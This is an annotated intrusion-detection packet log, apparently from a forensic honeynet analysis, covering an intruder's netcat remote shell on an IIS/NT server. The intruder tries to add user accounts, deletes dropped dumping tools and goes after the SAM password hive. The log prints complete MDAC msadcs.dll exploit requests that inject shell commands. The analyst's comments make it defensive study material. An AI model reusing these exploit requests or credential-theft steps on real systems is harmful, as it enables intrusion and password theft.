!@# Tries to add another user 'hi' (password 'guy') from the remote shell. This fails with system error 1312.
[**] netcat session 6969 [**]
02/04-06:00:36.390263 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:381 IpLen:20 DgmLen:63 DF
***AP*** Seq: 0x2CBF3B4D Ack: 0x9E440053 Win: 0x1CFE TcpLen: 20
net users hi guy /ADD..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:00:36.876595 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:637 IpLen:20 DgmLen:254 DF
***AP*** Seq: 0x2CBF3B64 Ack: 0x9E440053 Win: 0x1CFE TcpLen: 20
System error 1312 has occurred...... A specified logon session d
oes not exist. It may already have... been terminated........C:
\Program Files\Common Files\System\msadc>..C:\Program Files\Comm
on Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:00:43.950510 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:2173 IpLen:20 DgmLen:206 DF
***AP*** Seq: 0x2CBF3C3A Ack: 0x9E44005B Win: 0x1CF6 TcpLen: 20
/net....The filename, directory name, or volume label syntax is
incorrect.....C:\Program Files\Common Files\System\msadc>..C:\Pr
ogram Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:00:52.311128 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:4989 IpLen:20 DgmLen:241 DF
***AP*** Seq: 0x2CBF3CE0 Ack: 0x9E44006C Win: 0x1CE5 TcpLen: 20
netnet password..The name specified is not recognized as an..int
ernal or external command, operable program or batch file.....C:
\Program Files\Common Files\System\msadc>..C:\Program Files\Comm
on Files\
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:00:52.802289 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:5245 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0x2CBF3DA9 Ack: 0x9E44006C Win: 0x1CE5 TcpLen: 20
System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:01:11.138310 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:7293 IpLen:20 DgmLen:50 DF
***AP*** Seq: 0x2CBF3DB6 Ack: 0x9E440076 Win: 0x1CDB TcpLen: 20
net user..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:01:11.626415 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:7549 IpLen:20 DgmLen:393 DF
***AP*** Seq: 0x2CBF3DC0 Ack: 0x9E440076 Win: 0x1CDB TcpLen: 20
..User accounts for \\.....-------------------------------------
------------------------------------------..Administrator
Guest IUSR_KENNY ..IWAM_KE
NNY ..The command completed with one or more error
s........C:\Program Files\Common Files\System\msadc>..C:\Program
Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:01:14.849464 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:9341 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0x2CBF3F21 Ack: 0x9E440083 Win: 0x1CCE TcpLen: 20
net user /?..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:01:15.322342 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:9597 IpLen:20 DgmLen:323 DF
***AP*** Seq: 0x2CBF3F2E Ack: 0x9E440083 Win: 0x1CCE TcpLen: 20
The syntax of this command is:.......NET USER [username [passwor
d | *] [options]] [/DOMAIN].. username {password | *} /A
DD [options] [/DOMAIN].. username [/DELETE] [/DOMAIN]...
...C:\Program Files\Common Files\System\msadc>..C:\Program Files
\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:01:36.576987 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:15741 IpLen:20 DgmLen:71 DF
***AP*** Seq: 0x2CBF4049 Ack: 0x9E4400A2 Win: 0x1CAF TcpLen: 20
net user himan HarHar666 /ADD..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries to add another account (himan / HarHar666) using the remote shell. This fails.
[**] netcat session 6969 [**]
02/04-06:01:37.051478 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:15997 IpLen:20 DgmLen:254 DF
***AP*** Seq: 0x2CBF4068 Ack: 0x9E4400A2 Win: 0x1CAF TcpLen: 20
System error 1312 has occurred...... A specified logon session d
oes not exist. It may already have... been terminated........C:
\Program Files\Common Files\System\msadc>..C:\Program Files\Comm
on Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:02:55.297924 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:19581 IpLen:20 DgmLen:50 DF
***AP*** Seq: 0x2CBF413E Ack: 0x9E4400AC Win: 0x1CA5 TcpLen: 20
net name..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Runs 'net name' command from remote shell
[**] netcat session 6969 [**]
02/04-06:02:55.756158 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:19837 IpLen:20 DgmLen:307 DF
***AP*** Seq: 0x2CBF4148 Ack: 0x9E4400AC Win: 0x1CA5 TcpLen: 20
..Name ..--------------------------------------------
-----------------------------------..LAB ..ADMINISTR
ATOR ..The command completed successfully........C:\Program Fi
les\Common Files\System\msadc>..C:\Program Files\Common Files\Sy
stem\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:03:14.723932 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:21885 IpLen:20 DgmLen:50 DF
***AP*** Seq: 0x2CBF4253 Ack: 0x9E4400B6 Win: 0x1C9B TcpLen: 20
net user..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:03:15.181429 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:22141 IpLen:20 DgmLen:393 DF
***AP*** Seq: 0x2CBF425D Ack: 0x9E4400B6 Win: 0x1C9B TcpLen: 20
..User accounts for \\.....-------------------------------------
------------------------------------------..Administrator
Guest IUSR_KENNY ..IWAM_KE
NNY ..The command completed with one or more error
s........C:\Program Files\Common Files\System\msadc>..C:\Program
Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:03:21.630777 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:23677 IpLen:20 DgmLen:64 DF
***AP*** Seq: 0x2CBF43BE Ack: 0x9E4400CE Win: 0x2238 TcpLen: 20
net user Administrator..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries to run 'net user Administrator' from remote shell. This fails (system error 1312)
[**] netcat session 6969 [**]
02/04-06:03:22.105133 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:23933 IpLen:20 DgmLen:254 DF
***AP*** Seq: 0x2CBF43D6 Ack: 0x9E4400CE Win: 0x2238 TcpLen: 20
System error 1312 has occurred...... A specified logon session d
oes not exist. It may already have... been terminated........C:
\Program Files\Common Files\System\msadc>..C:\Program Files\Comm
on Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:05.982766 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:28797 IpLen:20 DgmLen:182 DF
***AP*** Seq: 0x2CBF44AC Ack: 0x9E4400D9 Win: 0x222D TcpLen: 20
cd /winnt..The syntax of the command is incorrect.....C:\Program
Files\Common Files\System\msadc>..C:\Program Files\Common Files
\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:06.884215 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:29309 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF453A Ack: 0x9E4400DE Win: 0x2228 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\System\
msadc....02/04/01 06:43a ...02/04/01 06:
43a
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:07.431721 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:29565 IpLen:20 DgmLen:912 DF
***AP*** Seq: 0x2CBF4602 Ack: 0x9E4400DE Win: 0x2228 TcpLen: 20
....09/25/97 07:41a 596 adc
javas.inc..09/25/97 07:41a 589 adcvbs.inc..04
/30/97 11:00p 208,144 cmd1.exe..09/25/97 08:28a
172,816 msadce.dll..09/25/97 08:16a
5,632 msadcer.dll..09/25/97 08:24a 23,312 msa
dcf.dll..09/25/97 08:24a 91,408 msadco.dll..09/2
5/97 08:19a 5,120 msadcor.dll..09/26/97 08:19a
42,256 msadcs.dll..02/04/01 06:41a
59,392 nc.exe..02/04/01 06:41a 32,768 pdump.e
xe..10/02/97 07:28a 19,388 readme.txt..02/04/01
06:41a 36,864 samdump.dll.. 15 File
(s) 698,285 bytes.. 1,690,852,86
4 bytes free....C:\Program Files\Common Files\System\msadc>..C:\
Program Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:11.991372 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:31613 IpLen:20 DgmLen:73 DF
***AP*** Seq: 0x2CBF496A Ack: 0x9E4400E9 Win: 0x221D TcpLen: 20
cd \winnt....C:\WINNT>..C:\WINNT>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:18.000392 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:32637 IpLen:20 DgmLen:177 DF
***AP*** Seq: 0x2CBF498B Ack: 0x9E440118 Win: 0x21EE TcpLen: 20
cd C:\Program Files\Common Files\System\msadc....C:\Program File
s\Common Files\System\msadc>..C:\Program Files\Common Files\Syst
em\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:24.459833 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:33917 IpLen:20 DgmLen:198 DF
***AP*** Seq: 0x2CBF4A14 Ack: 0x9E44011F Win: 0x21E7 TcpLen: 20
del c..Could Not Find C:\Program Files\Common Files\System\msadc
\c....C:\Program Files\Common Files\System\msadc>..C:\Program Fi
les\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses the remote shell to clean up files in 'C:\Program Files\Common Files\System\msadc'
!@# Deletes samdump.dll and pdump.exe
[**] netcat session 6969 [**]
02/04-06:05:27.814657 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:35709 IpLen:20 DgmLen:147 DF
***AP*** Seq: 0x2CBF4AB2 Ack: 0x9E440130 Win: 0x21D6 TcpLen: 20
del samdump.dll....C:\Program Files\Common Files\System\msadc>..
C:\Program Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:31.219668 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:37501 IpLen:20 DgmLen:145 DF
***AP*** Seq: 0x2CBF4B1D Ack: 0x9E44013F Win: 0x21C7 TcpLen: 20
del pdump.exe....C:\Program Files\Common Files\System\msadc>..C:
\Program Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:36.878005 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:38269 IpLen:20 DgmLen:177 DF
***AP*** Seq: 0x2CBF4B86 Ack: 0x9E440145 Win: 0x21C1 TcpLen: 20
del ..The syntax of the command is incorrect.....C:\Program File
s\Common Files\System\msadc>..C:\Program Files\Common Files\Syst
em\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:40.633348 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:39805 IpLen:20 DgmLen:72 DF
***AP*** Seq: 0x2CBF4C0F Ack: 0x9E44014F Win: 0x21B7 TcpLen: 20
cd\winnt....C:\WINNT>..C:\WINNT>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:42.936881 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:41085 IpLen:20 DgmLen:141 DF
***AP*** Seq: 0x2CBF4C2F Ack: 0x9E44015A Win: 0x21AC TcpLen: 20
cd resp....The filename, directory name, or volume label syntax
is incorrect.....C:\WINNT>..C:\WINNT>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Navigates remote shell to 'C:\WINNT\repair\'. Going for the SAM
[**] netcat session 6969 [**]
02/04-06:05:44.839517 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:42109 IpLen:20 DgmLen:87 DF
***AP*** Seq: 0x2CBF4C94 Ack: 0x9E440165 Win: 0x21A1 TcpLen: 20
cd repair....C:\WINNT\repair>..C:\WINNT\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:46.041637 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:42877 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF4CC3 Ack: 0x9E44016A Win: 0x219C TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\WINNT\repair....11/26/00 06:43p
...11/26/00 06:43p .
...10/13
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:46.583109 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:43133 IpLen:20 DgmLen:620 DF
***AP*** Seq: 0x2CBF4D8B Ack: 0x9E44016A Win: 0x219C TcpLen: 20
/96 07:38p 438 autoexec.nt..11/26/00 12:34p
2,510 config.nt..11/26/00 06:43p
15,677 default._..11/26/00 06:43p 14,946 ntuser
.da_..11/26/00 06:43p 4,593 sam._..11/26/00 06
:43p 6,066 security._..11/26/00 06:54p
50,405 setup.log..11/26/00 06:43p 124,776
software._..11/26/00 06:43p 80,874 system._..
11 File(s) 300,285 bytes..
1,690,922,496 bytes free....C:\WINNT\repair>..C:\WINNT\rep
air>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Runs 'rdisk -s/' from the remote shell to try to update this copy of the SAM database.
[**] netcat session 6969 [**]
02/04-06:05:51.449246 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:44669 IpLen:20 DgmLen:51 DF
***AP*** Seq: 0x2CBF4FCF Ack: 0x9E440175 Win: 0x2191 TcpLen: 20
rdisk -s/..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:51.909627 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:44925 IpLen:20 DgmLen:76 DF
***AP*** Seq: 0x2CBF4FDA Ack: 0x9E440175 Win: 0x2191 TcpLen: 20
..C:\WINNT\repair>..C:\WINNT\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:55.155196 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:46461 IpLen:20 DgmLen:189 DF
***AP*** Seq: 0x2CBF4FFE Ack: 0x9E44017B Win: 0x218B TcpLen: 20
d.rd..The name specified is not recognized as an..internal or ex
ternal command, operable program or batch file.....C:\WINNT\repa
ir>..C:\WINNT\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:05:59.310848 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:47997 IpLen:20 DgmLen:87 DF
***AP*** Seq: 0x2CBF5093 Ack: 0x9E440186 Win: 0x2180 TcpLen: 20
rdisk -/s....C:\WINNT\repair>..C:\WINNT\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Runs rdisk -/s
[**] netcat session 6969 [**]
02/04-06:06:00.763248 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:48765 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF50C2 Ack: 0x9E44018B Win: 0x217B TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\WINNT\repair....11/26/00 06:43p
...11/26/00 06:43p .
...10/13
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:06:01.311033 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:49021 IpLen:20 DgmLen:620 DF
***AP*** Seq: 0x2CBF518A Ack: 0x9E44018B Win: 0x217B TcpLen: 20
/96 07:38p 438 autoexec.nt..11/26/00 12:34p
2,510 config.nt..11/26/00 06:43p
15,677 default._..11/26/00 06:43p 14,946 ntuser
.da_..11/26/00 06:43p 4,593 sam._..11/26/00 06
:43p 6,066 security._..11/26/00 06:54p
50,405 setup.log..11/26/00 06:43p 124,776
software._..11/26/00 06:43p 80,874 system._..
11 File(s) 300,285 bytes..
1,690,922,496 bytes free....C:\WINNT\repair>..C:\WINNT\rep
air>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# runs rdisk
[**] netcat session 6969 [**]
02/04-06:06:06.270993 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:49789 IpLen:20 DgmLen:83 DF
***AP*** Seq: 0x2CBF53CE Ack: 0x9E440192 Win: 0x2174 TcpLen: 20
rdisk....C:\WINNT\repair>..C:\WINNT\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# then runs rdisk -s
[**] netcat session 6969 [**]
02/04-06:06:09.776270 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:51581 IpLen:20 DgmLen:86 DF
***AP*** Seq: 0x2CBF53F9 Ack: 0x9E44019C Win: 0x216A TcpLen: 20
rdisk -s....C:\WINNT\repair>..C:\WINNT\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:06:10.779103 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:52093 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF5427 Ack: 0x9E4401A1 Win: 0x2165 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\WINNT\repair....11/26/00 06:43p
...11/26/00 06:43p .
...10/13
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Looking at the timestamps in the directory listing it does not appear that any of these worked.
[**] netcat session 6969 [**]
02/04-06:06:11.335085 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:52349 IpLen:20 DgmLen:620 DF
***AP*** Seq: 0x2CBF54EF Ack: 0x9E4401A1 Win: 0x2165 TcpLen: 20
/96 07:38p 438 autoexec.nt..11/26/00 12:34p
2,510 config.nt..11/26/00 06:43p
15,677 default._..11/26/00 06:43p 14,946 ntuser
.da_..11/26/00 06:43p 4,593 sam._..11/26/00 06
:43p 6,066 security._..11/26/00 06:54p
50,405 setup.log..11/26/00 06:43p 124,776
software._..11/26/00 06:43p 80,874 system._..
11 File(s) 300,285 bytes..
1,690,922,496 bytes free....C:\WINNT\repair>..C:\WINNT\rep
air>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:06:15.734998 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:53373 IpLen:20 DgmLen:189 DF
***AP*** Seq: 0x2CBF5733 Ack: 0x9E4401A7 Win: 0x215F TcpLen: 20
cat ..The name specified is not recognized as an..internal or ex
ternal command, operable program or batch file.....C:\WINNT\repa
ir>..C:\WINNT\repair>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Attempts to read sam._ in the remote shell and gets "Access is denied": this shell is running without the privilege needed to read the repair copies of the hives.
[**] netcat session 6969 [**]
02/04-06:06:19.890923 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:54909 IpLen:20 DgmLen:107 DF
***AP*** Seq: 0x2CBF57C8 Ack: 0x9E4401B3 Win: 0x2153 TcpLen: 20
type sam._..Access is denied.....C:\WINNT\repair>..C:\WINNT\repa
ir>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run rdisk -/s (the first of several guesses at rdisk's switch syntax; the requests below try -s, no switch, -s/ and finally /s-)
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-06:06:32.383142 213.116.251.162:1964 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13562 IpLen:20 DgmLen:725 DF
***AP*** Seq: 0xB3AA6A94 Ack: 0x2CD45E6D Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 531..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 322..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .r
.d.i.s.k. .-./.s.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t
. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w
.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s
.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run rdisk -s
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-06:06:38.240958 213.116.251.162:1966 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13574 IpLen:20 DgmLen:723 DF
***AP*** Seq: 0xB3C24085 Ack: 0x2CD475BE Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 529..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 320..........~...S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .r
.d.i.s.k. .-.s.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t.
.A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i
.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t
.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run rdisk
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-06:06:42.283638 213.116.251.162:1968 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13585 IpLen:20 DgmLen:717 DF
***AP*** Seq: 0xB3D3A1EF Ack: 0x2CD48596 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 523..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 314..........x...S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .r
.d.i.s.k.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c
